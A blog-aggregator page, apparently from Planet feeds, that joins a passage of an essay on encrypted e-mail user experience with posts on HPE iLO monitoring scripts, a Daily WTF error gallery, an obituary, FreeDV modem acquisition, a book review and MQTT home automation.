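class MessageProtection:
    encrypted: bool          # content known only to sender and recipients?
    signature: Signature     # did it come from the apparent sender, as written?

# The four combinations discussed above:
plain     = MessageProtection(encrypted=False, signature=Signature.NONE)
signed    = MessageProtection(encrypted=False, signature=Signature.VALID)
sealed    = MessageProtection(encrypted=True,  signature=Signature.NONE)
protected = MessageProtection(encrypted=True,  signature=Signature.VALID)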

Partial protections

Sadly, the current encrypted e-mail mechanisms are likely to make even these proposed two indicators blurry if we try to represent them in detail. To avoid adding to user confusion, we need to draw some bright lines.

  • For integrity and authenticity, either the entire message is signed and integrity-checked, or it isn't. We must not report messages as being signed when only a part of the message is signed, or when the signature comes from someone not in the From: field. We should probably also not present "broken signature" status any differently than we present unsigned mail. See discussion on the enigmail mailing list about some of these tradeoffs.

  • For confidentiality, the user likely cares that the entire message was confidential. But there are some circumstances (e.g., when replying to an e-mail, and deciding whether to encrypt or not) when they likely care if any part of the message was confidential (e.g. if an encrypted part is placed next to a cleartext part).

It's interesting (and frustrating!) to note that these are scoped slightly differently -- that we might care about partial confidentiality but not about partial integrity and authenticity.

Note that while we might care about partial confidentiality, actually representing which parts of a message were confidential represents a significant UI challenge in most MUAs.

To the extent that a MUA decides it wants to display details of a partially-protected message, i recommend that the MUA strip/remove all non-protected parts of the message, and just show the user the (remaining) protected parts. In the event that a message has partial protections like this, the MUA may need to offer the user a choice of seeing the entire partially-protected message, or the stripped down message that has complete protections.

To the extent that we expect to see partially-protected messages in the real world, further UI/UX exploration would be welcome. It would be great to imagine a world where those messages simply don't exist though :)

Cryptographic Mechanism

There are three major categories of cryptographic protection for e-mail in use today: Inline PGP, PGP/MIME, and S/MIME.

Inline PGP

I've argued elsewhere (and it remains true) that Inline PGP signatures are terrible. Inline PGP encryption is also terrible, but in different ways:

  • it doesn't protect the structure of the message (e.g., the number and size of attachments is visible)

  • it has no way of protecting confidential message headers (see the Protected Headers section below)

  • it is very difficult to safely represent to the user what has been encrypted and what has not, particularly if the message body extends beyond the encrypted block.

No MUA should ever emit messages using inline PGP, either for signatures or for encryption. And no MUA should ever display an inline-PGP-signed block as though it was signed. Don't even bother to validate such a signature.

However, some e-mails will arrive using inline PGP encryption, and responsible MUAs probably need to figure out what to show to the user in that case, because the user wants to know what's there. :/

PGP/MIME and S/MIME

PGP/MIME and S/MIME are roughly equivalent to one another, with the largest difference being their certificate format. PGP/MIME messages are signed/encrypted with certificates that follow the OpenPGP specification, while S/MIME messages rely on certificates that follow the X.509 specification.

The cryptographic protections of both PGP/MIME and S/MIME work at the MIME layer, providing particular forms of cryptographic protection around a subtree of other MIME parts.

Both standards have very similar existing flaws that must be remedied or worked around in order to have sensible user experience for encrypted mail.

This document has no preference of one message format over the other, but acknowledges that it's likely that both will continue to exist for quite some time. To the extent possible, a sensible MUA that wants to provide the largest coverage will be able to support both message formats and both certificate formats, hopefully with the same fixes to the underlying problems.

Cryptographic Envelope

Given that the plausible standards (PGP/MIME and S/MIME) both work at the MIME layer, it's worth thinking about the MIME structure of a cryptographically-protected e-mail message. I introduce here two terms related to an e-mail message: the "Cryptographic Envelope" and the "Cryptographic Payload".

Consider the MIME structure of a simple cleartext PGP/MIME signed message:

0A └┬╴multipart/signed
0B  ├─╴text/plain
0C  └─╴application/pgp-signature

Consider also the simplest PGP/MIME encrypted message:

1A └┬╴multipart/encrypted
1B  ├─╴application/pgp-encrypted
1C  └─╴application/octet-stream
1D     ╤ <<decryption>>
1E     └─╴text/plain

Or, an S/MIME encrypted message:

2A └─╴application/pkcs7-mime; smime-type=enveloped-data
2B     ╤ <<decryption>>
2C     └─╴text/plain

Note that the PGP/MIME decryption step (denoted "1D" above) may also include a cryptographic signature that can be verified, as a part of that decryption. This is not the case with S/MIME, where the signing layer is always separated from the encryption layer.

Also note that any of these layers of protection may be nested, like so:

3A └┬╴multipart/encrypted
3B  ├─╴application/pgp-encrypted
3C  └─╴application/octet-stream
3D     ╤ <<decryption>>
3E     └┬╴multipart/signed
3F      ├─╴text/plain
3G      └─╴application/pgp-signature

For an e-mail message that has some set of these layers, we define the "Cryptographic Envelope" as the layers of cryptographic protection that start at the root of the message and extend until the first non-cryptographic MIME part is encountered.

Cryptographic Payload

We can call the first non-cryptographic MIME part we encounter (via depth-first search) the "Cryptographic Payload". In the examples above, the Cryptographic Payload parts are labeled 0B, 1E, 2C, and 3F. Note that the Cryptographic Payload itself could be a multipart MIME object, like 4E below:

4A └┬╴multipart/encrypted
4B  ├─╴application/pgp-encrypted
4C  └─╴application/octet-stream
4D     ╤ <<decryption>>
4E     └┬╴multipart/alternative
4F      ├─╴text/plain
4G      └─╴text/html

In this case, the full subtree rooted at 4E is the "Cryptographic Payload".
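As a purely illustrative sketch of that depth-first walk, here is how one might peel off the Cryptographic Envelope layers using Python's email package. Decryption is deliberately out of scope (when the walk hits an encrypted layer it simply stops, since the payload is only reachable after decrypting), and the example file name is made up.

# Sketch only: walk from the root of a parsed message, collecting the
# cryptographic layers until we hit the first non-cryptographic part.
import email
from email import policy

ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime"}

def envelope_and_payload(part):
    """Return ([envelope layer content types], payload part or None)."""
    envelope = []
    while True:
        ctype = part.get_content_type()
        if ctype == "multipart/signed":
            envelope.append(ctype)
            part = part.get_payload(0)   # the signed content; [1] is the signature
        elif ctype in ENCRYPTED_TYPES:
            envelope.append(ctype)
            return envelope, None        # payload sits behind the encryption layer
        else:
            return envelope, part        # first non-cryptographic part: the Payload

with open("example.eml", "rb") as f:
    msg = email.message_from_binary_file(f, policy=policy.default)

layers, payload = envelope_and_payload(msg)
print(layers, payload.get_content_type() if payload else "(needs decryption)")

Note that for a message whose root is not a cryptographic layer, this sketch returns an empty envelope with the whole message as the payload, which matches the "null Cryptographic Envelope" case described just below.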

The cryptographic properties of the message should be derived from the layers in the Cryptographic Envelope, and nothing else, in particular:

  • the cryptographic signature associated with the message, and
  • whether the message is "fully" encrypted or not.

Note that if some subpart of the message is protected, but the cryptographic protections don't start at the root of the MIME structure, there is no message-wide cryptographic envelope, and therefore there either is no Cryptographic Payload, or (equivalently) the whole message (5A here) is the Cryptographic Payload, but with a null Cryptographic Envelope:

5A └┬╴multipart/mixed
5B  ├┬╴multipart/signed
5C  │├─╴text/plain
5D  │└─╴application/pgp-signature
5E  └─╴text/plain

Note also that if there are any nested encrypted parts, they do not count toward the Cryptographic Envelope, but may mean that the message is "partially encrypted", albeit with a null Cryptographic Envelope:

6A └┬╴multipart/mixed
6B  ├┬╴multipart/encrypted
6C  │├─╴application/pgp-encrypted
6D  │└─╴application/octet-stream
6E  │   ╤ <<decryption>>
6F  │   └─╴text/plain
6G  └─╴text/plain

Layering within the Envelope

The order and number of the layers in the Cryptographic Envelope might make a difference in how the message's cryptographic properties should be considered.

signed+encrypted vs encrypted+signed

One difference is whether the signature is made over the encrypted data, or whether the encryption is done over the signature. Encryption around a signature means that the signature was hidden from an adversary. And a signature around the encryption indicates that the sender may not know the actual contents of what was signed.

The common expectation is that the signature will be inside the encryption. This means that the signer likely had access to the cleartext, and it is likely that the existence of the signature is hidden from an adversary, both of which are sensible properties to want.

Multiple layers of signatures or encryption

Some specifications define triple-layering: signatures around encryption around signatures. It's not clear that this is in wide use, or how any particular MUA should present such a message to the user.

In the event that there are multiple layers of protection of a given kind in the Cryptographic Envelope, the message should be marked based on the properties of the inner-most layer of encryption, and the inner-most layer of signing. The main reason for this is simplicity -- it is unclear how to indicate arbitrary (and potentially-interleaved) layers of signatures and encryption.

(FIXME: what should be done if the inner-most layer of signing can't be validated for some reason, but one of the outer layers of signing does validate? ugh MIME is too complex…)

Signed messages should indicate the intended recipient

Ideally, all signed messages would indicate their intended recipient as a way of defending against some forms of replay attack. For example, Alice sends a signed message to Bob that says "please perform task X"; Bob reformats and forwards the message to Charlie as though it was directly from Alice. Charlie might now believe that Alice is asking him to do task X, instead of Bob.

Of course, this concern also includes encrypted messages that are also signed. However, there is no clear standard for how to include this information in either an encrypted message or a signed message.

An e-mail specific mechanism is to ensure that the To: and Cc: headers are signed appropriately (see the "Protected Headers" section below).

See also Vincent Breitmoser's proposal of Intended Recipient Fingerprint for OpenPGP as a possible OpenPGP-specific implementation.

However: what should the MUA do if a message is encrypted but no intended recipients are listed? Or what if a signature clearly indicates the intended recipients, but does not include the current reader? Should the MUA render the message differently somehow?

Protected Headers

Sadly, e-mail cryptographic protections have traditionally only covered the body of the e-mail, and not the headers. Most users do not (and should not have to) understand the difference. There are two not-quite-standards for protecting the headers:

  • message wrapping, which puts an entire e-mail message (message/rfc822 MIME part) "inside" the cryptographic protections. This is also discussed in RFC 5751 §3.1. I don't know of any MUAs that implement this.

  • memory hole, which puts headers on the top-level MIME part directly. This is implemented in Enigmail and K-9 mail.

These two different mechanisms are roughly equivalent, with slight differences in how they behave for clients who can handle cryptographic mail but have not implemented them. If a MUA is capable of interpreting one form successfully, it probably is also capable of interpreting the other.

Note that in particular, the cryptographic headers for a given message ought to be derived directly from the headers present (in one of the above two ways) in the root element of the Cryptographic Payload MIME subtree itself. If headers are stored anywhere else (e.g. in one of the leaf nodes of a complex Payload), they should not propagate to the outside of the message.

If the headers the user sees are not protected, that lack of protection may need to be clearly explained and visible to the user. This is unfortunate because it is potentially extremely complex for the UI.

The types of cryptographic protections can differ per header. For example, it's relatively straightforward to pack all of the headers inside the Cryptographic Payload. For a signed message, this would mean that all headers are signed. This is the recommended approach when generating an encrypted message. In this case, the "outside" headers simply match the protected headers. And in the case that the outsider headers differ, they can simply be replaced with their protected versions when displayed to the user. This defeats the replay attack described above.

But for an encrypted message, some of those protected headers will be stripped from the outside of the message, and others will be placed in the outer header in cleartext for the sake of deliverability. In particular, From: and To: and Date: are placed in the clear on the outside of the message.

So, consider a MUA that receives an encrypted, signed message, with all headers present in the Cryptographic Payload (so all headers are signed), but From: and To: and Date: in the clear on the outside. Assume that the external Subject: reads simply "Encrypted Message", but the internal (protected) Subject: is actually "Thursday's Meeting".

When displaying this message, how should the MUA distinguish between the Subject: and the From: and To: and Date: headers? All headers are signed, but only Subject: has been hidden. Should the MUA assume that the user understands that e-mail metadata like this leaks to the MTA? This is unfortunately true today, but not something we want in the long term.

Message-ID and threading headers

Messages that are part of an e-mail thread should ensure that Message-Id: and References: and In-Reply-To: are signed, because those markers provide contextual considerations for the signed content. (e.g., a signed message saying "I like this plan!" means something different depending on which plan is under discussion).

That said, given the state of the e-mail system, it's not clear what a MUA should do if it receives a cryptographically-signed e-mail message where these threading headers are not signed. That is the default today, and we do not want to incur warning fatigue for the user. Furthermore, unlike Date: and Subject: and From: and To: and Cc:, the threading headers are not usually shown directly to the user, but instead affect the location and display of messages.

Perhaps there is room here for some indicator at the thread level, that all messages in a given thread are contextually well-bound? Ugh, more UI complexity.

Protecting Headers during e-mail generation

When generating a cryptographically-protected e-mail (either signed or encrypted or both), the sending MUA should copy all of the headers it knows about into the Cryptographic Payload using one of the two techniques referenced above. For signed-only messages, that is all that needs doing.

The challenging question is for encrypted messages: which headers on the outside of the message (outside the Cryptographic Envelope) can be stripped (removed completely) or stubbed (replaced with a generic or randomized value)?

Subject: should obviously be stubbed -- for most users, the subject is directly associated with the body of the message (it is not thought of as metadata), and the Subject is not needed for deliverability. Since some MTAs might treat a message without a Subject: poorly, and arbitrary Subject lines are a nuisance, it is recommended to use the exact string below for all external Subjects:

Subject: Encrypted Message

However, stripping or stubbing other headers is more complex.

The date header can likely be stripped from the outside of an encrypted message, or can have its temporal resolution made much more coarse. However, this doesn't protect much information from the MTAs that touch the message, since they are likely to see the message when it is in transit. It may protect the message from some metadata analysis as it sits on disk, though.

The To: and Cc: headers could be stripped entirely in some cases, though that may make the e-mail more prone to being flagged as spam. However, some e-mail messages sent to Bcc groups are still deliverable, with a header of

To: undisclosed-recipients:;

Note that the Cryptographic Envelope itself may leak metadata about the recipient (or recipients), so stripping this information from the external header may not be useful unless the Cryptographic Envelope is also stripped of metadata appropriately.

The From: header could also be stripped or stubbed. It's not clear whether such a message would be deliverable, particularly given DKIM and DMARC rules for incoming domains. Note that the MTA will still see the SMTP MAIL FROM: verb before the message body is sent, and will use the address there to route bounces or DSNs. However, once the message is delivered, a stripped From: header is an improvement in the metadata available on-disk. Perhaps this is something that a friendly/cooperative MTA could do for the user?

Even worse is the Message-Id: header and the associated In-Reply-To: and References: headers. Some MUAs (like notmuch) rely heavily on the Message-Id:. A message with a stubbed-out Message-Id would effectively change its Message-Id: when it is decrypted. This may not be a straightforward or safe process for MUAs that are Message-ID-centric. That said, a randomized external Message-ID: header could help to avoid leaking the fact that the same message was sent to multiple people, so long as the message encryption to each person was also made distinct.

Stripped In-Reply-To: and References: headers are also a clear metadata win -- the MTA can no longer tell which messages are associated with each other. However, this means that an incoming message cannot be associated with a relevant thread without decrypting it, something that some MUAs may not be in a position to do.

Recommendation for encrypted message generation in 2018: copy all headers during message generation; stub out only the Subject for now.

Bold MUAs may choose to experiment with stripping or stubbing other fields beyond Subject:, possibly in response to some sort of signal from the recipient that they believe that stripping or stubbing some headers is acceptable. Where should such a signal live? Perhaps a notation in the recipient's certificate would be useful.
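For illustration, a minimal sketch of the 2018 recommendation above could look like this; encrypt_to_mime() is a placeholder for whatever PGP/MIME or S/MIME machinery the MUA actually uses, not a real library call.

# Sketch only: keep every header on the protected part (so it is signed and
# encrypted), and on the outside keep only what delivery needs, with the
# Subject stubbed out.
from email.message import EmailMessage

def protect(inner: EmailMessage, encrypt_to_mime) -> EmailMessage:
    outer = encrypt_to_mime(inner)               # inner, headers and all, becomes the Cryptographic Payload
    for header in ("From", "To", "Cc", "Date"):  # left in the clear for deliverability
        if header in inner:
            outer[header] = inner[header]
    outer["Subject"] = "Encrypted Message"       # stub; the real Subject travels inside
    return outer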

Key management

Key management bedevils every cryptographic scheme, e-mail or otherwise. The simplest solution for users is to automate key management as much as possible, making reasonable decisions for them. The Autocrypt project outlines a sensible approach here, so i'll leave most of this section short and hope that it's covered by Autocrypt. While fully-automated key management is likely to be susceptible either to MITM attacks or trusted third parties (depending on the design), as a community we need to experiment with ways to provide straightforward (possibly gamified?) user experience that enables and encourages people to do key verification in a fun and simple way. This should probably be done without ever mentioning the word "key", if possible. Serious UI/UX work is needed. I'm hoping future versions of Autocrypt will cover that territory.

But however key management is done, the result for the e-mail user experience is that the MUA will have some sense of the "validity" of a key being used for any particular correspondent. If it is expressed at all, it should be done as simply as possible by default. In particular, MUAs should avoid confusing the user with distinct (nearly orthogonal) notions of "trust" and "validity" while reading messages, and should not necessarily associate the validity of a correspondent's key with the validity of a message cryptographically associated with that correspondent's key. Identity is not the same thing as message integrity, and trustworthiness is not the same thing as identity either.

Key changes over time

Key management is hard enough in the moment. With a store-and-forward system like e-mail, evaluating the validity of a signed message a year after it was received is tough. Your concept of the correspondent's correct key may have changed, for example. I think our understanding of what to do in this context is not currently clear.

Planet DebianSven Hoexter: Replacing hp-health on gen10 HPE DL360

A small followup regarding the replacement of hp-health and hpssacli. It turns out a few things have to be replaced; lucky all of you already running on someone else's computer, where you do not have to take care of the hardware.

ssacli

According to the super nice and helpful Craig L. at HPE they're planning an update for the MCP ssacli for Ubuntu 18.04. This one will also support the SmartArray firmware 1.34. If you need it now you should be able to use the one released for RHEL and SLES. I did not test it.

replacing hp-health

The master plan is to query the iLO. Basically there are two ways: either locally via hponcfg, or remotely via a Perl script sample provided by HPE along with many helpful RIBCL XML file examples. Both approaches are not cool because you have to deal with a lot of XML, so opt for a third way and use the awesome python-hpilo module (part of Debian/stretch) which abstracts all the RIBCL XML stuff nicely away from you.

If you'd like to have a taste of it, I had to reset a few ilo passwords to something sane, without quotes, double quotes and backticks, and did it like this:

#!/bin/bash
# Reset the iLO Administrator password on each host and record host,password pairs.
pwfile="ilo-pwlist-$(date +%s)"

for x in $(seq -w 004 006); do
  pw=$(pwgen -n 24 1)
  host="host-${x}"
  echo "${host},${pw}" >> $pwfile
  ssh $host "echo \"<RIBCL VERSION=\\\"2.0\\\"><LOGIN USER_LOGIN=\\\"adminname\\\" PASSWORD=\\\"password\\\"><USER_INFO MODE=\\\"write\\\"><MOD_USER USER_LOGIN=\\\"Administrator\\\"><PASSWORD value=\\\"$pw\\\"/></MOD_USER></USER_INFO></LOGIN></RIBCL>\" > /tmp/setpw.xml"
  ssh $host "sudo hponcfg -f /tmp/setpw.xml && rm /tmp/setpw.xml"
done

After I regained access to all iLO devices I used the hpilo_cli helper to add a monitoring user:

#!/bin/bash
# Read the host,password list written above and add an unprivileged "monitoring" user to each iLO.
while read -r line; do
  host=$(echo $line|cut -d',' -f 1)
  pw=$(echo $line|cut -d',' -f 2)
  hpilo_cli -l Administrator -p $pw $host add_user user_login="monitoring" user_name="monitoring" password="secret" admin_priv=False remote_cons_priv=False reset_server_priv=False virtual_media_priv=False config_ilo_priv=False
done < ${1}

The helper script to actually query the iLO interfaces from our monitoring is, in comparison to those ad-hoc shell hacks, rather nice:

#!/usr/bin/python3
import hpilo, argparse
iloUser="monitoring"
iloPassword="secret"

parser = argparse.ArgumentParser()
parser.add_argument("component", help="HW component to query", choices=['battery', 'bios_hardware', 'fans', 'memory', 'network', 'power_supplies', 'processor', 'storage', 'temperature'])
parser.add_argument("host", help="iLO Hostname or IP address to connect to")
args = parser.parse_args()

def askIloHealth(component, host, user, password):
    ilo = hpilo.Ilo(host, user, password)
    health = ilo.get_embedded_health()
    print(health['health_at_a_glance'][component]['status'])

askIloHealth(args.component, args.host, iloUser, iloPassword)

You can also take a look at a more detailed state if you pprint the complete structure returned by "get_embedded_health". This whole approach of using the iLO should work since iLO 3. I tested versions 4 and 5.

Worse Than FailureError'd: Kind of...but not really

"On occasion, SQL Server Management Studio's estimates can be just a little bit off," writes Warrent B.

 

Jay D. wrote, "On the surface, yeah, it looks like a good deal, but you know, pesky laws of physics spoil all the fun."

 

"When opening a new tab in Google Chrome I saw a link near the bottom of the screen that suggested I 'Explore the world's iconic locations in 3D'," writes Josh M., "Unfortunately, Google's API felt differently."

 

Stuart H. wrote, "I think I might have missed out on this deal, the clock was counting up, no I mean down, I mean negative AHHHH!"

 

"Something tells me this site's programmer is learning how to spell the hard(est) way," Carl W. writes.

 

"Why limit yourself with one particular resource of the day when you can substitute any resource you want," wrote Ari S.

 


Planet Linux AustraliaBlueHackers: Vale Janet Hawtin Reid

Janet Hawtin Reid (@lucychili) sadly passed away last week.

A mutual friend called me earlier in the week to tell me, for which I’m very grateful.  We both appreciate that BlueHackers doesn’t ever want to be a news channel, so I waited to write about it here until other friends, just like me, would have also had a chance to hear via more direct and personal channels. I think that’s the way these things should flow.

Knitted Moomin troll, by Janet Hawtin Reid.

I knew Janet as a thoughtful person, with strong opinions particularly on openness and inclusion.  And as an artist and generally creative individual,  a lover of nature.  In recent years I’ve also seen her produce the most awesome knitted Moomins.

Short diversion as I have an extra connection with the Moomin stories by Tove Jansson: they have a character called My, after whom Monty Widenius’ eldest daughter is named, which in turn is how MySQL got named.  I used to work for MySQL AB, and I’ve known that My since she was a little smurf (she’s an adult now).

I’m not sure exactly when I met Janet, but it must have been around 2004 when I first visited Adelaide for Linux.conf.au.  It was then also that Open Source Industry Australia (OSIA) was founded, for which Janet designed the logo.  She may well have been present at the founding meeting in Adelaide’s CBD, too.  Anyhow, Janet offered to do the logo in a conversation with David Lloyd, and things progressed from there. On the OSIA logo design, Janet wrote:

I’ve used a star as the current one does [an earlier doodle incorporated the Southern Cross]. The 7 points for 7 states [counting NT as a state]. The feet are half facing in for collaboration and half facing out for being expansive and progressive.

You may not have realised this as the feet are quite stylised, but you’ll definitely have noticed the pattern-of-7, and the logo as a whole works really well. It’s a good looking and distinctive logo that has lasted almost a decade and a half now.

As Linux Australia’s president Kathy Reid wrote, Janet also helped design the ‘penguin feet’ logo that you see on Linux.org.au.  Just reading the above (which I just retrieved from a 2004 email thread) there does seem to be a bit of a feet-pattern there… of course the explicit penguin feet belong with the Linux penguin.

So, Linux Australia and OSIA actually share aspects of their identity (feet with a purpose), through their respective logo designs by Janet!  Mind you, I only realised all this when looking through old stuff while writing this post, as the logos were done at different times and only a handful of people have ever read the rationale behind the OSIA logo until now.  I think it’s cool, and a fabulous visual legacy.

Fir tree in clay, by Janet Hawtin Reid. Done in “EcoClay”, brought back to Adelaide from OSDC 2010 (Melbourne) by Kim Hawtin, Janet’s partner.

Which brings me to a related issue that’s close to my heart, and I’ve written and spoken about this before.  We’re losing too many people in our community – where, in case you were wondering, too many is defined as >0.  Just like in a conversation on the road toll, any number greater than zero has to be regarded as unacceptable. Zero must be the target, as every individual life is important.

There are many possible analogies with trees as depicted in the above artwork, including the fact that we’re all best enabled to grow further.

Please connect with the people around you.  Remember that connecting does not necessarily mean talking per-se, as sometimes people just need to not talk, too.  Connecting, just like the phrase “I see you” from Avatar, is about being thoughtful and aware of other people.  It can just be a simple hello passing by (I say hi to “strangers” on my walks), a short email or phone call, a hug, or even just quietly being present in the same room.

We all know that you can just be in the same room as someone, without explicitly interacting, and yet feel either connected or disconnected.  That’s what I’m talking about.  Aim to be connected, in that real, non-electronic, meaning of the word.

If you or someone you know needs help or talk right now, please call 1300 659 467 (in Australia – they can call you back, and you can also use the service online).  There are many more resources and links on the BlueHackers.org website.  Take care.

Planet Linux AustraliaDavid Rowe: FreeDV 700D Part 4 – Acquisition

Since 2012 I have built a series of modems (FDMDV, COHPSK, OFDM) for HF Digital voice. I always get stuck on “acquisition” – demodulator algorithms that acquire and lock onto the received signal. The demod needs to rapidly estimate the frequency offset and “coarse” timing – the position where the modem frame starts in the sequence of received samples.

For my application (Digital Voice over HF), it’s complicated by the low SNR and fading HF channels, and the requirement for fast sync (a few hundred ms). For Digital Voice (DV) we need something fast enough to emulate Push To Talk (PTT) operation. In comparison HF data modems have it easy – they can take many lazy seconds to synchronise.

The latest OFDM modem has been no exception. I’ve spent several weeks messing about with acquisition algorithms to get half decent performance. Still some tuning to do but for my own sanity I think I’ll stop development here for now, write up the results, and push FreeDV 700D out for general consumption.

Acquisition and Sync Requirements

  1. Sync up quickly (a few 100ms) with high SNR signals.
  2. Sync up eventually (a few seconds is OK) for low SNR signals over poor channels. Sync eventually is better than none on channels where even SSB is struggling.
  3. Detect false sync and get out of it quickly. Don’t stay stuck in a false sync state forever.
  4. Hang onto sync through fades of a few seconds.
  5. Assume the operator can tune to within +/- 20Hz of a given frequency.
  6. Assume the radio drifts no more than +/- 0.2Hz/s (12 Hz a minute).
  7. Assume the sample clock offset (difference in ADC/DAC sample rates) is no more than 500ppm.

Actually the last three aren’t really requirements, it’s just what fell out of the OFDM modem design when I optimised it for low SNR performance on HF channels! The frequency stability of modern radios is really good; sound card sample clock offset less so but perhaps we can measure that and tell the operator if there is a problem.

Testing Acquisition

The OFDM modem sends pilot (known) symbols every frame. The demodulator correlates (compares) the incoming signal with the pilot symbol sequence. When it finds a close match it has a coarse timing candidate. It can then try to estimate the frequency offset. So we get a coarse timing estimate, a metric (called mx1) that says how close the match is, and a frequency offset estimate.

Estimating frequency offsets is particularly tricky; I’ve experienced “much wailing and gnashing of teeth” with these nasty little algorithms in the past (stop laughing Matt). The coarse timing estimator is more reliable. The problem is that if you get an incorrect coarse timing or frequency estimate the modem can lock up incorrectly and may take several seconds, or operator intervention, before it realises its mistake and tries again.

I ended up writing a lot of GNU Octave functions to help develop and test the acquisition algorithms in ofdm_dev.

For example, the function below runs 100 tests, measures the timing and frequency error, and plots some histograms. The core demodulator can cope with about +/- 1.5Hz of residual frequency offset and a few samples of timing error. So we can generate probability estimates from the test results. For example, if we do 100 tests of the frequency offset estimator and 50 are within 1.5Hz of being correct, then we can say we have a 50% (0.5) probability of getting the correct frequency estimate.

octave:1> ofdm_dev
octave:2> acquisition_histograms(fin_en=0, foff_hz=-15, EbNoAWGN=-1, EbNoHF=3)
AWGN P(time offset acq) = 0.96
AWGN P(freq offset acq) = 0.60
HF P(time offset acq) = 0.87
HF P(freq offset acq) = 0.59

Here are the histograms of the timing and frequency estimation errors. These were generated using simulations of noisy HF channels (about 2dB SNR):


The x axis of timing is in samples, x axis of freq in Hz. They are both a bit biased towards positive errors. Not sure why. This particular test was with a frequency offset of -15Hz.

Turns out that as the SNR improves, the estimators do a better job. The next function runs a bunch of tests at different SNRs and frequency offsets, and plots the acquisition probabilities:

octave:3> acquisition_curves




The timing estimator also gives us a metric (called mx1) that indicates how strong the match was between the incoming signal and the expected pilot sequence. Here is a busy little plot of mx1 against frequency offset for various Eb/No (effectively SNR):

So as Eb/No increases, the mx1 metric tends to get bigger. It also falls off as the frequency offset increases. This means sync is tougher at low Eb/No and larger frequency offsets. The -10dB value was thrown in to see what happens with pure noise and no signal at the input. We’d prefer not to sync up to that. Using this plot I set the threshold for a valid signal at 0.25.

Once we have a candidate time and freq estimate, we can test sync by measuring the number of bit errors in a set of 10 Unique Word (UW) bits spread over the modem frame. Unlike the payload data in the modem frame, these bits are fixed, and known to the transmitter and receiver. In my initial approach I placed the UW bits right at the start of the modem frame. However I discovered a problem – with certain frequency offsets (e.g. multiples of the modem frame rate like +/- 6Hz) – it was possible to get a false sync with no UW errors. So I messed about with the placement of the UW bits until I had a UW that would not give any false syncs at any incorrect frequency offset. To test the UW I wrote another script:

octave:4> debug_false_sync

Which outputs a plot of UW errors against the residual frequency offset:

Note how at any residual frequency offset other than -1.5 to +1.5 Hz there are at least two bit errors. This allows us to reliably detect a false sync due to an incorrect frequency offset estimate.

State Machine

The estimators are wrapped up in a state machine to control the entire sync process (a rough sketch in code follows the list):

  1. SEARCHING: look at a buffer of incoming samples and estimate timing, freq, and the mx1 metric.
  2. If mx1 is big enough, let’s jump to TRIAL.
  3. TRIAL: measure the number of Unique Word bit errors for a few frames. If they are bad this is probably a false sync so jump back to SEARCHING.
  4. If we get a low number of Unique Word errors for a few frames it’s high fives all round and we jump to SYNCED.
  5. SYNCED: We put up with up to two seconds of high Unique Word errors, as this is life on a HF channel. More than two seconds, and we figure the signal is gone for good so we jump back to SEARCHING.
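For illustration only, a toy version of that state machine might look like the sketch below. estimate() and uw_errors() stand in for the real demodulator functions, the 0.25 mx1 threshold comes from the plot above, and the remaining numbers (frame duration, how many trial frames, what counts as a "bad" frame) are assumptions rather than values from the actual FreeDV source.

# Toy sketch of the SEARCHING / TRIAL / SYNCED logic described above.
class SyncStateMachine:
    def __init__(self, estimate, uw_errors, frame_seconds=0.16):
        self.estimate = estimate        # samples -> (coarse timing, freq offset, mx1)
        self.uw_errors = uw_errors      # samples -> Unique Word bit errors in this frame
        self.frame_seconds = frame_seconds
        self.state = "SEARCHING"
        self.trial_frames = 0
        self.bad_seconds = 0.0

    def step(self, samples):
        if self.state == "SEARCHING":
            timing, freq, mx1 = self.estimate(samples)
            if mx1 > 0.25:                       # strong enough match: give it a try
                self.state, self.trial_frames = "TRIAL", 0
        elif self.state == "TRIAL":
            if self.uw_errors(samples) > 2:
                self.state = "SEARCHING"         # probably a false sync
            else:
                self.trial_frames += 1
                if self.trial_frames >= 4:       # a few good frames: high fives all round
                    self.state, self.bad_seconds = "SYNCED", 0.0
        elif self.state == "SYNCED":
            if self.uw_errors(samples) > 2:
                self.bad_seconds += self.frame_seconds
                if self.bad_seconds > 2.0:       # more than two seconds: signal is gone
                    self.state = "SEARCHING"
            else:
                self.bad_seconds = 0.0
        return self.state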

Reading Further

HF Modem Frequency Offset Estimation, an earlier look at freq offset estimation for HF modems
COHPSK and OFDM waveform design spreadsheet
Modems for HF Digital Voice Part 1
Modems for HF Digital Voice Part 2
README_ofdm.txt, including specifications of the OFDM modem.

,

Rondam RamblingsA quantum mechanics puzzle, part drei

[This post is the third part of a series.  You should read parts one and two before reading this or it won't make any sense.] So we have two more cases to consider: Case 3: we pulse the laser with very short pulses, emitting only one photon at a time.  This is actually not possible with a laser, but it is possible with something like this single-photon-emitting light source (which was actually

Planet DebianShirish Agarwal: Reviewing Agent 6

The city I come from, Pune, has been experiencing somewhat of a heat-wave, so I have been cutting back on a lot of work and getting a lot of backlogged reading done. One of the first books I read was Tom Rob Smith’s Agent 6. Fortunately, I read only the third book and not the first two, which from the synopsis seem to be more gruesome than the one I read, so I guess there is something to be thankful for.

Agent 6 copyright - Tom Rob Smith & Publishers

While I was reading about the book, I had thought that the MGB was a fictitious organization invented by the author. But a quick look at Wikipedia told me that it is what the KGB was later based upon.

I found the book to be both an easy read and a layered one. I was lucky to get a large-print version, so I was able to share the experience with my mother as well. The book is somewhat hefty as it tops out around 600 pages, although it is listed as 480 pages on Amazon.

As I had shared previously, I had read Russka and had been disappointed to see how the Russian public were let down time and again in their hopes for democracy. I do understand that the book (Russka) was written by a western author and could have tapped into some unconscious biases, but it seemed accurate as far as I could verify from public resources. I may return to that story at a future date, but this time it is Agent 6’s turn.

I found the book pretty immersive, and at the same time it left me thinking about the many threads the author touches on but then moves away from. I was left wondering, and many times just had to sleep on it and think deep thoughts, as there was quite a lot to chew on.

I am not going to spoil any surprises except to say there are quite a few twists and the ending is also what I didn’t expect.

At the end, if you appreciate politics, history, bit of adventure and have a bit of patience, the book is bound to reward you. It is not meant to be a page-turner but if you are one who enjoys savoring your drink you are going to enjoy it thoroughly.

Planet DebianJonathan McDowell: Home Automation: Getting started with MQTT

I’ve been thinking about trying to sort out some home automation bits. I’ve moved from having a 7 day heating timer to a 24 hour timer and I’d forgotten how annoying that is at weekends. I’d like to monitor temperatures in various rooms and use that, along with presence detection, to be a bit more intelligent about turning the heat on. Equally I wouldn’t mind tying my Alexa in to do some voice control of lighting (eventually maybe even using DeepSpeech to keep everything local).

